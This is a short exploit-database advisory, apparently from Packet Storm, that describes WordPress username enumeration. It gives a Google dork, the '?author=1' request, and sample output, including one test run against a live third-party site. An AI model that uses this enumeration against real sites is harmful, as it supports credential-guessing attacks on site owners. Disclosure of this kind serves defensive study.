A simple request to WordPress discloses a given author's name in the title when you enumerate values for author=.
523ced8ffd06cb5ce06338ed19e6b1fe16dd2776ba083fa543553d63fdd4b571# Exploit Title: Wordpress All Version Wp-Admin Username Vulnerability
# Google Dork: inurl:/?author=1
# Date: 17/09/12
# Exploit Author: PistqoN
# E-Mail: Pistqon@hotmail.com
# Software Link: http://wordpress.org/download/
# Version: All
# Tested on: Linux Ubuntu - Windows 7 - Windows Xp
# Video: https://vimeo.com/49694640
# Exploit work on
[+] http://localhost/wordpress/?author=1
[+] Title: Wordpress - admin > http://localhost/wordpress/wp-login.php > Username (admin)
# Online Test
[+] http://www.wordpress.org/?author=1
[+] Title: Wordpress - Matt Mullenweg > http://www.wordpress.org/wp-login.php > Username (Matt Mullenweg)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed